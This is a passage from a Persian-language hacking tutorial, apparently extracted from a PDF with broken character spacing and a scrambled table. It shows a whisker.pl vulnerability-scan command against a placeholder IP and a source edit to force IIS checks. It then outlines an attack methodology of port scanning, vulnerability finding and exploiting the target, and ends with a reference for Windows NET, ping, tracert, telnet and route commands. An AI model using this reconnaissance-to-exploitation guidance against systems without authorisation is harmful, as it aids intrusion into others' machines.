ﮐﺎر هﺴﺘﻨﺪ ﺡﺘﻤﺎ ﻣﻴﺪاﻧﻨﺪ ﮐﻪ ﺕﺎﺏﻊ Teeﮐﺎرش ایﻦ هﺴﺖ ﮐﻪ ﺧﺮوﺟﯽ را از ﺏﺮﻧﺎﻣﻪ در ﺡﺎل اﺟ ﺮا ﻟﺤﻈ ﻪ ﺏ ﻪ ﻟﺤﻈ ﻪ ﻣﻴﮕﻴﺮد و ﺏﻪ ﻣﺎ ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ و اﻟﺒﺘﻪ ذﺧﻴﺮﻩ هﻢ ﻣﻴﮑﻨﺪ. ﺧﻮب ﺏﺎ ﻓﺮﻣﺎن زیﺮ ﻣﻴﺸﻮد ﻧﻮع وب ﺱﺮور را ﺕﺸﺨﻴﺺ داد ﺏﺎ ایﻦ ﺏﺮﻧﺎﻣﻪ : "$ whisker.pl –h xxx.xxx.xxx.xxx –vv –W –s "IIS/5.0
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٥٥
اﻟﺒﺘﻪ ﺷﻤﺎ ﺏﺎیﺪ ﺏﻪ ﺟﺎی IIS/5.0ﻧﻮع ﺱﺮویﺲ دهﻨﺪﻩ را ﺡﺪس ﺏﺰیﺪ و ﺏﻌﺪ ﺏﺮﻧﺎﻣﻪ را اﺟﺮا ﮐﻨﻴ ﺪ .ﮐ ﺎر ای ﻦ دﺱ ﺘﻮر ای ﻦ اﺱ ﺖ ﮐ ﻪ )ﻧﮑﺘ ﻪ :ﺕﻤ ﺎم ﺧ ﻮرﻩ هﺎی Deificﺡﺘﻤﺎ ﻣﻴﺪاﻧﻨﺪ ﮐﻪ ﺱﺮویﺲ " ﺏﻴﻠﯽ " ﺟﻮن از ی ﮏ ﻣﮑ ﺎﻧﻴﺰﻣﯽ اﺱ ﺘﻔﺎدﻩ ﻣﻴﮑﻨ ﺪ ﮐ ﻪ ﺧ ﻮدش را ﺟ ﺎی ﻣ ﺪل ه ﺎی دیﮕ ﻪ ﺟ ﺎ ﻣﻴﺰﻧ ﺪ!! ( ﺏ ﺪون ﺕﻮﺟﻪ ﺏﻪ ﻧﻮع ﺱﺮویﺲ دهﻨﺪﻩ اﻧﻮاع ﺏﺮﺱﯽ هﺎی ﺧﺎص ﻣﺪل IIS/5.0را اﻧﺠﺎم ﻣﻴﺪهﺪ. ﺏﺮای ﺏﻬﺒﻮد ایﻦ ﮐﺎر ﺏﻬﺘﺮ اﺱﺖ در ﮐﺪ ﻣﻨﺒﻊ ایﻦ ﻧﺮم اﻓﺰار ﺏﻌﺪ از دو ﺧﻂ زیﺮ: ; " ) $ D { ` XXServerAgent ` } = " mozilla/5.0 [EN] (Win95; U ; ) }$ D { ` XXForce ` } = 1 if defined ( $args {f ﺧﻂ زیﺮ را درج ﮐﻨﻴﺪ : ; ) }$ D { ` XXForceS ` } =1 if defined ( $args {S ﺧﻮب اﺧﺮیﻦ ﻧﮑﺘﻪ ایﻦ اﺱﺖ ﮐﻪ اﮔﺮ اﺡﺘﻴﺎﺟﯽ ﺏﻪ ﮐﻠﻤﻪ ﻋﺒﻮر ﺏﻮد یﮏ ﺱﻮیﭻ –aرا ﻧﻮﺷﺘﻪ ﺏﻌﺪ " " username:passwordایﻦ ﺷﮑﻠﯽ ﮐﻠﻤ ﻪ ﻋﺒ ﻮر و ﻧﺎم ﮐﺎرﺏﺮی را وارد ﻣﻴﮑﻨﻴﻢ . ﺧﻮب ایﻦ از ایﻦ ،ﺏﺮﻧﺎﻣﻪ هﺎی ﺧﻔﻦ ایﻦ ﮐﺎرﻩ ﺏﻪ ﻏﻴﺮ از ایﻦ ﺏﺮﻧﺎﻣ ﻪ ﮐ ﻪ ﻣﻌﺮﻓ ﯽ ﮐ ﺮدم ﻣﻴ ﺸﻮد ﺏ ﻪ Niktoﮐ ﻪ ﻧ ﺴﺨﻪ ﺁن ﺏ ﺮای هﻤ ﻪ ﺱﻴ ﺴﺘﻢ ﻋﺎﻣﻠﻬ ﺎ ﻧﻮﺷﺘﻪ ﺷﺪﻩ اﺱﺖ ﻧﺎم ﺏﺮد .ایﻦ هﻢ ﺕﺤﺖ زﺏﺎن Perlﻧﻮﺷﺘﻪ ﺷﺪﻩ و یﮏ ﻣﻔﺴﺮ ﺏﺮای ویﻨﺪوز ﻻزم دارد .ایﻦ هﻢ ﻣﺜﻞ ﺏ ﺎﻻی اﺱ ﺖ ﺕﻮﺽ ﻴﺤﺎت اش را ﺏ ﻪ ﺧﻮدﺕﺎن واﮔﺬار ﻣﻴﮑﻨﻢ !! ﺏﺮﻧﺎﻣﻪ ﺏﻌﺪی ﺧﻔﻨﯽ ﮐﻪ ﻣﻴﺘ ﻮاﻧﻢ ﺏ ﻪ ﺷ ﻤﺎ ﻣﻌﺮﻓ ﯽ ﮐ ﻨﻢ اﻟﺒﺘ ﻪ ﻓﻘ ﻂ ﺏ ﺮای ویﻨ ﺪوز ﺏﺮﻧﺎﻣ ﻪ ﺧﻔ ﻦ Stealthاﺱ ﺖ ﮐ ﻪ ی ﮏ ﻣﺤ ﻴﻂ ﮔﺮاﻓﻴﮑﯽ ﺱﺎدﻩ هﻢ دارد ﮐﺎر ﺏﺎ ایﻦ ﺱﺎدﻩ اﺱﺖ ﭘﺲ ﺏﻪ ﺧﻮدﺕﺎن ﻣﻴﺴﭙﺎرم ﺕﻮﺽﻴﺤﺎت ﺁن را )ﺡﺘﻤﺎ اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ ﭼﻮن ﮐﺎرایﯽ اش ﺧﻮب( !!!
ﮔﺎم ﭼﻬﺎرم و اﻟﺒﺘﻪ ﺁﺧﺮیﻦ ﮔﺎم : ﻣﺎ در ﮔﺎم اول ﺱﻌﯽ ﮐﺮدیﻢ ﺏﻔﻬﻤﻴﻢ اﺻﻼ ﻣﺎﺷﻴﻦ ﻣﻮرد ﻧﻈﺮ ﻣﺎ ﮐﺠﺎ اﺱﺖ ﭼﻪ ﺱﻴﺴﺘﻢ ﻋﺎﻣﻠﯽ دارد ﭼﻨﺪ ﺱ ﺮور دارد و ه ﺮ ﺱ ﺮویﺲ روی ﮐ ﺪام ﻣﺎﺷ ﻴﻦ اﺱﺖ و ﭼﻪ ﮐﺴﯽ ای ﺱﺎیﺖ را ﺙﺒﺖ ﮐﺮدﻩ ﻣﺤﺪودﻩ ﺷﺒﮑﻪ ﺁن ﮐﺪام اﺱﺖ در ﭼﻪ ﮐﺸﻮری اﺱﺖ ﻣﺎﺏﻴﻦ ﻣﺎ و ﻣﺎﺷ ﻴﻦ ه ﺪف ﭼﻨ ﺪ ﻣﺎﺷ ﻴﻦ واﺱ ﻄﻪ ﺏﺮﻗ ﺮاری ارﺕﺒﺎط هﺴﺘﻨﺪ ﺁیﺎ دیﻮار ﺁﺕﺸﯽ ﺏﻴﻦ ﻣﺎ و ﻣﺎﺷﻴﻦ هﺪف اﺱﺖ و ﭼﻨﺪ ﻣ ﺴﻴﺮ ی ﺎب ﺏ ﻴﻦ ﻣ ﺎ و ه ﺪف ﻗ ﺮار دارد و ...ﮐ ﻪ ﺏﻌ ﺪ از داﻧ ﺴﺘﻦ ای ﻦ اﻃﻼﻋ ﺎت ﭘﺎی ﻪ ﺕﺼﻤﻴﻢ ﺧﻮد ﺏﺮای ﻣﺎﺷﻴﻦ هﺪف و ﺡﻤﻠﻪ ،و ﺱﻴﻄﺮﻩ ﺏﺮ ﻣﺎﺷﻴﻦ هﺪف را ﺁﻏﺎز ﻣﻴﮑﻨ ﻴﻢ ﺏ ﺮای ای ﻦ ﮐ ﺎر ﺏﻌ ﺪ از اﻧﺘﺨ ﺎب ﻣﺎﺷ ﻴﻦ ه ﺪف ﺷ ﺮوع ﺏ ﻪ ﭘ ﻮیﺶ ﭘﻮرت هﺎی ﺏﺎز ﮐﺮدﻩ و دﺱﺖ ﺏﻪ ﺷﻨﺎﺱﺎیﯽ ﺱﺮویﺲ ﺏﺎز ﮐﻨﻨﺪﻩ ﭘﻮرت زدﻩ ﺏﺎ ایﻦ ﮐﺎر ﻣﻴﺘﻮان اﻟﺒﺘﻪ ﺏﺮای ﺏﺎ ﺕﺠﺮﺏﻪ ه ﺎ از هﻤ ﻴﻦ ﺟ ﺎ ﻣﺮﺡﻠ ﻪ ﺡﻤﻠ ﻪ را ﺏ ﺎ داﻧﺴﺘﻦ ﻧﻘﻄﻪ ﺽﻌﻔﻬﺎی ﺱﺮویﺲ ﺷﺮوع ﮐﺮدﻩ اﻣﺎ ﻣﺎ ﭼﻮن ﺏﯽ ﺕﺠﺮﺏﻪ هﺴﺘﻴﻢ ﻣﺮﺡﻠﻪ ﺏﻌﺪ را اﻧﺠﺎم ﻣﻴﺪهﻴﻢ ﺏﺎ ایﻦ ﮐﺎر ﻧﻘﺎط ﺽﻌﻒ و اﺱﻴﺐ ﭘ ﺬیﺮ ﻣﺎﺷ ﻴﻦ ه ﺪف ﺷﻨﺎﺱ ﺎیﯽ ﺷ ﺪﻩ و ﻣ ﺎ ﺏ ﻪ ﺱ ﺮاغ ﻣﻄﺎﻟ ﺐ ﺁﻣﻮزﻧ ﺪﻩ در ﺏ ﺎرﻩ ﺁن رﻓﺘ ﻪ و ﺏ ﺮای ﺁن ه ﻢ اﮔ ﺮ ﺏﺮﻧﺎﻣ ﻪ ﻧ ﻮیﺲ ه ﺴﺘﻴﻢ ی ﮏ ﺏﺮﻧﺎﻣ ﻪ ﮐ ﺎرﺏﺮدی ﻣﻴﻨﻮی ﺴﻢ ) (Exploitو ﮔﺮﻧﻪ دﻧﺒﺎل ﺏﺮﻧﺎﻣﻪ ﮐﺎرﺏﺮدی ﺏ ﺮای ﺏﻬ ﺮﻩ ﺏ ﺮداری از ﺁن ﺡﻔ ﺮﻩ ﻣﻴﮕ ﺮدیﻢ .ﺱ ﭙﺲ ﺏﻌ ﺪ از ای ﻦ ﻣﺮﺡﻠ ﻪ ﺏ ﺎ ﺕﻮﺟ ﻪ ﺏ ﻪ ﺏﺮﻧﺎﻣ ﻪ ﮐ ﺎرﺏﺮدی و ﻣﻄﺎﻟﺒﯽ ﮐﻪ ﻣﻄﺎﻟﻌﻪ ردﻩ ایﻦ در ایﻦ ﺏﺎرﻩ ﺡﻤﻠﻪ را ﺕﺪارک دیﺪﻩ و ﮐﺎر را ﺕﻤﺎم ﻣﻴﮑﻨﻴﻢ. ﺧﻮب ایﻦ هﻢ از ﮔﺎم ﭼﻬﺎرم و ﺁﺧﺮیﻦ ﮔﺎم از ایﻦ ﺏﻪ ﺏﻌﺪ ﺏﻪ ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار هﺎی ﮐﺎرﺏﺮدی ﻣﺘﻔﺮﻗﻪ اﻣﺎ ﮐﺎﻣﻼ ﻣﺮﺕﺒﻂ ﺏﺎ ایﻦ ﻣﻘﻮﻟﻪ ﻣﻴﭙﺮدازم . ﺿﻤﻴﻤﻪ اول ؛ ﺁﻣﻮزش ﺏﺮﻧﺎﻣﻪ هﺎی ﻣﺮﺏﻮط ﺏﻪ ﺷﺒﮑﻪ در داﺧﻞ ویﻨﺪوز : دﺱﺘﻮرهﺎی : NET ﮐﻪ ﺕﻤﺎم ﻓﺮﻣﺎن هﺎی ﺁن را ﺕﻮﺽﻴﺢ دادم در ﺟﺪول ؛ اﻟﺒﺘﻪ ﻗﺎﺏﻠﻴﺖ اﺟﺮای ﺁن ﻓﺮﻣ ﺎن را در ﻧ ﺴﺨﻪ ه ﺎیﯽ ویﻨ ﺪوز ﻧ ﺸﺎن دادﻩ ام )ﻧﺒ ﻮد ﻋﻼﻣ ﺖ ﻧ ﺸﺎن ﻧ ﺎ ﺕﻮاﻧﺎیﯽ ﺏﺮای اﺟﺮا ﺏﺮای ﺁن ﻧﺴﺨﻪ اﺱﺖ ( : ١
ﻋﻨﻮان ﻓﺮﻣﺎن Net accounts
٢
Net computer
٣
Net config
۴
Net continue
۵
Net diag
۶
Net file
XP
2000
ME
NT
9x
Җ
Җ
–
Җ
–
Җ Җ Җ – Җ
Җ Җ Җ – Җ
– Җ – Җ –
Җ Җ Җ – Җ
– Җ – Җ –
ﺕﻮﺽﻴﺢ ﻋﻤﻠﮑﺮد ﻓﺮﻣﺎن ﺕﻨﻈﻴﻤﺎت و ﺱﻴﺎﺱﺘﻬﺎی هﻤﻪ ﻧﺎﻣﻬﺎی ﮐﺎرﺏﺮی یﮏ رایﺎﻧﻪ یﺎ داﻣﻨﻪ ﺧﺎص را ﭘﻴﮑﺮ ﺏﻨﺪی ﻣﻴﮑﻨﺪ. از داﻣﻨﻪ ﺟﺎری رایﺎﻧﻪ هﺎ را ﺡﺬف یﺎ اﺽﺎﻓﻪ ﻣﻴﮑﻨﺪ. اﻃﻼﻋﺎت ﺱﺮویﺲ ﮔﻴﺮﻧﺪﻩ ﺷﺒﮑﻪ را ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ. راﻩ اﻧﺪازی یﮏ ﺱﺮویﺲ ﺕﻌﻠﻴﻖ ﺷﺪﻩ. ﻧﻤﺎیﺶ اﻃﻼﻋﺎت ﻣﻔﻴﺪی درﺏﺎرﻩ ﺱﺨﺖ اﻓﺰار اﺕﺼﺎﻻت ﺷﺒﮑﻪ. ﻓﺎیﻠﻬﺎی ﻣﺸﺘﺮک ﺏﻴﻦ ﮐﺎرﺏﺮان ﺷﺒﮑﻪ را ﺏﻪ ﻧﻤﺎیﺶ در ﻣﯽ ﺁورد و ﻣﻴﺒﻨﺪد ،و ﻗﻔﻞ ﻓﺎیﻞ هﺎ را ﺏﺮ ﻣﯽ دارد.
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !! ٧
Net group
Җ
Җ
–
Җ
–
٨
Net help
Җ
Җ
Җ
Җ
Җ
٩
Net helpmsg
Җ
Җ
–
Җ
–
١٠
Net init
–
–
Җ
–
Җ
١١
Net localgroup
Җ
Җ
–
Җ
–
١٢
Net name
١٣
Net logoff
١۴
Net logon
١۵
Net password
١۶
Net pause
١٧
Net print
Җ – – – Җ Җ
Җ – – – Җ Җ
– Җ Җ Җ – Җ
Җ – – – Җ Җ
– Җ Җ Җ – Җ
١٨
Net send
١٩
Net session
Җ Җ
Җ Җ
– –
Җ Җ
– –
٢٠
Net share
٢١
Net start
٢٢
Net statistics
٢٣
Net stop
٢۴
Net time
Җ Җ Җ Җ Җ
Җ Җ Җ Җ Җ
– Җ – Җ Җ
Җ Җ Җ Җ Җ
– Җ – Җ Җ
٢۵
Net use
Җ
Җ
Җ
Җ
Җ
٢۶
Net user
Җ
Җ
–
Җ
–
٢٧
Net ver
٢٨
Net view
– Җ
– Җ
Җ Җ
– Җ
Җ Җ
ﺻﻔﺤﻪ
٥٦
ﮔﺮوهﺎی ﺱﺮاﺱﺮی ایﺠﺎد یﺎ ﺡﺬف ﻣﯽ ﮐﻨﺪ و ﮐﺎرﺏﺮان را ﺏﺎ ﺁن ﮔﺮوﻩ هﺎ اﺽﺎﻓﻪ ،یﺎ از ﺁن ﺡﺬف ﻣﻴﮑﻨﺪ. اﻃﻼﻋﺎت ﮐﻤﮑﯽ در ﺏﺎرﻩ زیﺮ ﻓﺮﻣﺎن NETﺧﺎص را ﺏﻪ ﻧﻤﺎیﺶ در ﻣﯽ ﺁورد. درﺏﺎرﻩ یﮏ ﮐﺪ ﺧﻄﺎی ﭼﻬﺎر رﻗﻤﯽ ﺧﺎص اﻃﻼﻋﺎت اﺽﺎﻓﯽ ﺏﻪ ﻧﻤﺎیﺶ در ﻣﯽ ﺁورد. ﺏﺎرﮔﺬاری درایﻮرهﺎی ﻣﺮﺏﻮط ﺏﻪ ﭘﺮوﺕﮑﻞ و ﮐﺎرت ﺷﺒﮑﻪ ﻣﻮرد اﺱﺘﻔﺎدﻩ ﺏﺪون ﺏﻬﺮﻩ ﮔﻴﺮی از ﺏﺮﻧﺎﻣﻪ Windows Protocol . Manager ﮔﺮوهﺎی ﻣﺤﻠﯽ ایﺠﺎد ﻣﻴﮑﻨﺪ و ﮐﺎرﺏﺮان را ﺏﻪ ﺁن اﺽﺎﻓﻪ یﺎ از ﺁﻧﻬﺎ ﺡﺬف ﻣﯽ ﮐﻨﺪ. ﺕﻌﺮیﻒ ﻧﺎم ﻣﺴﺘﻌﺎر ﺟﺪیﺪی ﺏﺮای ارﺱﺎل ﭘﻴﻐﺎم . ﺧﺎﺕﻤﻪ ﺟﻠﺴﻪ ﻣﺎﺏﻴﻦ رایﺎﻧﻪ ﺡﺎﺽﺮ و رایﺎﻧﻪ ﺡﺎوی ﻣﻨﺎﺏﻊ ﻣﺸﺘﺮک. اﺕﺼﺎل ﺏﻪ ﺡﻮزﻩ یﺎ ﮔﺮوﻩ ﮐﺎری ﻣﻮرد ﻧﻈﺮ . ﺕﻐﻴﻴﺮ ﮐﻠﻤﻪ ﻋﺒﻮر ﮐﺎرﺏﺮی از ﺷﺒﮑﻪ. ﺕﻌﻠﻴﻖ یﮏ ﺱﺮویﺲ در ﺡﺎل اﺟﺮا. دﺱﺘﻴﺎﺏﯽ ﺏﻪ اﻃﻼﻋﺎﺕﯽ در ﻣﻮرد وﺽﻌﻴﺖ ﺻﻒ ﻣﺮﺏﻮط ﺏﻪ ﭼﺎﭘﮕﺮ ﻣﺘﺼﻞ ﺏﻪ یﮏ رایﺎﻧﻪ ﺧﺎص و ﮐﻨﺘﺮل ﺁن . ارﺱﺎل ﭘﻴﻐﺎم ﺏﻪ ﮐﺎرﺏﺮ یﺎ ﮐﺎﻣﭙﻴﻮﺕﺮ دیﮕﺮی ﺏﺮ روی ﺷﺒﮑﻪ. ﻧﻤﺎیﺶ و یﺎ ﺧﺎﺕﻤﻪ ﺟﻠﺴﺎت ﻣﺎ ﺏﻴﻦ رایﺎﻧﻪ ﺡﺎﺽﺮ و ﺱﺎیﺮ رایﺎﻧﻪ هﺎی ﻣﻮﺟﺪ در ﺷﺒﮑﻪ. ایﺠﺎد ،ﺡﺬف و ﻧﻤﺎیﺶ یﮏ ﻣﻨﺒﻊ ﻣﺸﺘﺮک . راﻩ اﻧﺪازی یﮏ ﺱﺮویﺲ ﺧﺎص. ﻧﻤﺎیﺶ ﺁﻣﺎری درﺏﺎرﻩ یﮏ ﺱﺮور یﺎ ایﺴﺘﮕﺎﻩ ﮐﺎری. ﺕﻮﻗﻒ یﮏ ﺱﺮویﺲ ﺧﺎص. ﻧﻤﺎیﺶ زﻣﺎن ﺟﺎری یﺎ ﺕﻨﻈﻴﻢ زﻣﺎن ﺏﺎ ﺱﺮوری ﺕﺤﺖ ﻋﻨﻮان time serverﭘﻮرت ١٣ﮐﻪ ﺏﻪ هﻤﻴﻦ ﻣﻨﻈﻮر ﺕﺪارک دیﺪﻩ ﺷﺪﻩ اﺱﺖ. اﺕﺼﺎل یﺎ ﻗﻄﻊ اﺕﺼﺎل از یﮏ ﺱﻴﺴﺘﻢ ﺡﺎوی ﻣﻨﺒﻊ ﻣﺸﺘﺮک ؛ ﻧﻤﺎیﺶ اﻃﻼﻋﺎت در ﻣﻮرد ﻣﻨﺒﻊ ﻣﺸﺘﺮک. ﺡﺬف یﺎ اﺽﺎﻓﻪ یﮏ ﺡﺴﺎب ﮐﺎرﺏﺮدی از ﻟﻴﺴﺖ ﮐﺎرﺏﺮان ﻣﻮﺟﺪ در ﺷﺒﮑﻪ. ﻧﻤﺎیﺶ ﻧﺴﺨﻪ ﻣﻮر اﺱﺘﻔﺎدﻩ از . Workgroup redirector ﻧﻤﺎیﺶ ﻟﻴﺴﺘﯽ از ﻣﻨﺎﺏﻊ ﻣﺸﺘﺮک ﻣﻮﺟﺪ ﺏﺮ روی یﮏ رایﺎﻧﻪ ﺧﺎص یﺎ ﺕﻤﺎم رایﺎﻧﻪ هﺎ ی ﻣﻮﺟﺪ در یﮏ زیﺮ ﺷﺒﮑﻪ ) اﺻﻄﻼﺡﺎ ( sub net
ﺧﻮب ایﻦ هﻢ از ایﻦ !!! ﻣﻦ ﻓﻘﻂ ﮐﺎر دﺱﺘﻮرهﺎ را ﮔﻔﺘﻢ ﮐﺎرﺏﺮد ﺕﮏ ﺕﮏ ﺁﻧﻬﺎ ﺏﺎ ﺧﻮدﺕﺎن !!! دﺱﺘﻮر : Ping ایﻦ دﺱﺘﻮر ﺏﺮای ﺕﺸﺨﻴﺺ ﺏﺎﻻ ) ﻓﻌﺎل ﺏﻮدن ﻣﺎﺷﻴﻦ( یﺎ ﭘﺎیﻴﻦ ﺏﻮدن یﮏ ﻣﺎﺷﻴﻦ اﺱﺖ .اﻟﺒﺘﻪ ﻣﻴﺸﻮد IPیﮏ ﺱﺎیﺖ را ﺏﺎ ایﻦ دﺱﺘﻮر ﺏﺪﺱ ﺖ ﺁورد اﻟﺒﺘ ﻪ زیﺎد ﺟﺎﻟﺐ ﻧﻴﺴﺖ ) ﻣﻌﻤﻮﻻ ﺷﻤﺎرﻩ IPﻣﺎﺷﻴﻦ ﺱﺮویﺲ دهﻨﺪﻩ وب را ﻣﻴﺪهﺪ ( ﮐﻪ ﺁدرس ﺱﺎیﺖ را ﻧﻮﺷﺖ و IPﺱﺎیﺖ را ﮐﺸﻒ ﮐﺮد !! دارای یﮏ ﺱﺮی ﺱﻮیﭻ اﺱﺖ ﮐﻪ ﺕﻮﺽﻴﺤﺎت ﺁن را ﻣﺸﺎهﺪﻩ ﻣﻴﮑﻨﻴﺪ. ﺱﻮیﭻ : –tﺁﻧﻘﺪر ﻣﻘﺼﺪ را ﭘﻴﻨﮓ ﻣﻴﮑﻨﺪ ﺕﺎ ﺷﻤﺎ ﺕﺎ ایﻨﮑﻪ ﺷﻤﺎ دﺱﺘﻮر ﺕﻮﻗﻒ را ﺻﺎدر ﮐﻨﻴﺪ . ﺱﻮیﭻ : –aﺁدرس IPﻣﻘﺼﺪ را ﺏﻪ اﺱﻢ ﻣﻴﺰﺏﺎن ﺕﺒﺪیﻞ ﻣﻴﮑﻨﺪ. ﺱﻮیﭻ : –nﺕﻌﺪاد ﺏﺴﺘﻪ هﺎیﯽ را ﮐﻪ ﻓﺮﺱﺘﺎدﻩ ﻣﻴﺸﻮد ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ.
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٥٧
ﺱﻮیﭻ : –lاﻧﺪازﻩ ﺏﺴﺘﻪ هﺎیﯽ را ﮐﻪ ﻓﺮﺱﺘﺎدﻩ ﻣﻴﺸﻮد ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ. ﺱﻮیﭻ : –fدر ﺏﺴﺘﻪ هﺎی ﮐﻪ ﻓﺮﺱﺘﺎدﻩ ﻣﻴﺸﻮد ﭘﺮﭼﻢ IP Do not Fragmentرا یﮏ ﻗﺮار ﻣﻴﺪهﺪ. ﺱﻮیﭻ : –iدر ﺏﺴﺘﻪ هﺎیﯽ ﮐﻪ ﻓﺮﺱﺘﺎدﻩ ﻣﻴﺸﻮد ﻣﻘﺪار TTLرا ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ) .ﺏﺎ ﻋﺒﻮر ﺏﺴﺘﻪ ﺷ ﻤﺎ از ه ﺮ ﻣﺎﺷ ﻴﻦ ی ﮏ واﺡ ﺪ از ﺁن ﮐ ﻢ ﻣﻴ ﺸﻮد و در ﺻﻮرت ﺻﻔﺮ ﺷﺪن ایﻦ ﭘﺎراﻣﺘﺮ ﺡﺬف ﻣﻴﺸﻮد ﺏﺴﺘﻪ ﺷﻤﺎ ؛ ﮐﻪ ﺏﺎ ایﻦ ﻣﮑﺎﻧﻴﺰم ﻓﺮﻣﺎن tracert.exeﮐ ﺎر ﻣﻴﮑﻨ ﺪ ﺏ ﺮای ﮐ ﺸﻒ ﺕﻌ ﺪاد ﻣﺎﺷ ﻴﻨﻬﺎی ﺷ ﻤﺎ و ﻣﻘﺼﺪ ﻣﻮر ﻧﻈﺮﺕﺎن(. ﺱﻮیﭻ : –vﻣﻘﺪار IP Type of Serviceرا ﺏﺮای ﺏﺴﺘﻪ هﺎی Echo Requestﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ. ﺱﻮیﭻ : –rﺁدرس IPﻣﺴﻴﺮیﺎب هﺎ را ﺏﺮای ﺕﻌﺪاد هﺎپ ﻣﺸﺨﺺ ﺷﺪﻩ ﺙﺒﺖ ﻣﻴﮑﻨﺪ. ﺱﻮیﭻ : –sﻣﻬﺮ زﻣﺎﻧﯽ ﻣﺴﻴﺮیﺎب هﺎ را ﺏﺮای ﺕﻌﺪاد هﺎپ ﻣﺸﺨﺺ ﺷﺪﻩ ﺙﺒﺖ ﻣﻴﮑﻨﺪ. ﺱﻮیﭻ : –jﻓﻬﺮﺱﺖ ﺏﺮﺧﯽ از ﻣﺴﻴﺮیﺎب هﺎ را ﮐﻪ ﺏﺴﺘﻪ هﺎ ﺏﺎیﺪ از ﺁن اﺱﺘﻔﺎدﻩ ﮐﻨﻨﺪ را ﻣﺸﺨﺺ ﻣﯽ ﮐﻨﺪ. ﺱﻮیﭻ : –kﻓﻬﺮﺱﺖ ﮐﻞ ﻣﺴﻴﺮیﺎب هﺎ را ﮐﻪ ﺏﺴﺘﻪ هﺎ ﺏﺎیﺪ از ﺁﻧﻬﺎ اﺱﺘﻔﺎدﻩ ﮐﻨﻨﺪ را ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ. ﺱﻮیﭻ : –wﻣﺪت زﻣﺎﻧﯽ ﮐﻪ ﺱﻴﺴﺘﻢ ﺏﺎیﺪ ﻣﻨﺘﻈﺮ هﺮ ﭘﺎﺱﺦ ﺏﻤﺎﻧﺪ را ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ. ﺏﺎز هﻢ ﻣﻦ ﻓﻘﻂ ﭘﺎراﻣﺘﺮ هﺎ را ﺕﻮﺽﻴﺢ دادم و اداﻣﻪ ﮐﺎر ﺏﺎ ﺧﻮدﺕﺎن !! ﻓﺮﻣﺎن : Tracert ایﻦ ﻓﺮﻣﺎن ﺏﺮای ﻣﺸﺨﺺ ﮐﺮدن ﻣﺴﻴﺮی اﺱﺖ ﮐﻪ ﺏﺮای رﺱﻴﺪن ﺏﺴﺘﻪ اﻃﻼﻋﺎﺕﯽ ﺷﻤﺎ ﺏﻪ هﺪف ﻣﻮرد اﺱﺘﻔﺎدﻩ ﻗﺮار ﮔﺮﻓﺘﻪ اﺱﺖ. دارای ﭼﻬﺎر ﺱﻮیﭻ اﺱﺖ ﮐﻪ ﺕﻮﺽﻴﺢ ﺁﻧﻬﺎ در زیﺮ ﺁﻣﺪﻩ اﺱﺖ . ﺱﻮیﭻ : –dﺏﺎ اﺱﺘﻔﺎدﻩ از ایﻦ ﺱﻮیﭻ ﻓﻘﻂ در ﻧﻤﺎیﺶ ﻧﺘﺎیﺞ IPهﺎ ﻧﺸﺎن دادﻩ ﻣﻴﺸﻮد. ﺱﻮیﭻ : –hﺏﺎ اﺱﺘﻔﺎدﻩ از ایﻦ ﺱﻮیﭻ ﺡﺪاﮐﺜﺮ ﺕﻌﺪاد ﻣﺎﺷﻴﻨﻬﺎ را ﻣﺸﺨﺺ ﻣﻴﮑﻨﻴﺪ ﮐﻪ اﻟﺒﺘﻪ ﭘﻴﺶ ﻓﺮض ٣٠اﺱﺖ ﮐﻪ ﮐﺎﻓﯽ اﺱﺖ. ﺱﻮیﭻ : –jﺏﺎ اﺱﺘﻔﺎدﻩ از ایﻦ ﺱﻮیﭻ از یﮏ ﻓﺎیﻞ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ . ﺱﻮیﭻ : –wﻣﺪت زﻣﺎﻧﯽ ﮐﻪ ﺱﻴﺴﺘﻢ ﺏﺎیﺪ ﻣﻨﺘﻈﺮ هﺮ ﭘﺎﺱﺦ ﺏﻤﺎﻧﺪ را ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ. دﺱﺘﻮر : Telnet ایﻦ دﺱﺘﻮر ﺏﺮای وﺻﻞ ﺷﺪن ﺏﻪ یﮏ ﭘﻮرت ﺧﺎص اﺱﺖ ﺏﻪ ایﻦ ﺻﻮرت ﮐﻪ : C :\> telnet xxx.xxx.xxx.xxx port number دﺱﺘﻮر : Route ایﻦ ﻓﺮﻣﺎن ﺏﺮای ﻣﺸﺎهﺪﻩ ﺟﺪول ﻣﺴﻴﺮ یﺎﺏﯽ و اﺽﺎﻓﻪ یﺎ ﺡﺬف ﮐﺮدن اﻗﻼم ﺁن اﺱﺖ ) .ﺟﺪول ﻣﺴﻴﺮ ی ﺎﺏﯽ ﺏ ﺮای ﺕﻌﻴ ﻴﻦ ﻣ ﯽ ﮐﻨ ﺪ ه ﺮ ﺏ ﺴﺘﻪ ﺏﺎی ﺪ ﺱ ﺮ از ﮐﺠﺎ در ﺏﯽ ﺁورد !! (. ] ]ROUTE [-F] [-P] [command [destination] [MASK netmask] [gateway] [METRIC metric] [IF interface ﻣﺘﻐﻴﻴﺮ commandیﮑﯽ از ایﻦ ﭼﻬﺎر ﻣﻘﺪار را ﻣﯽ ﮔﻴﺮد: اﮔﺮ ﺏﻪ ﻓﺮﻣﺎن ﺱﻮیﭻ –PRINTرا اﺽﺎﻓﻪ ﮐﻨﻴﺪ ﻣﺤﺘﻮای ﺟﺪول را 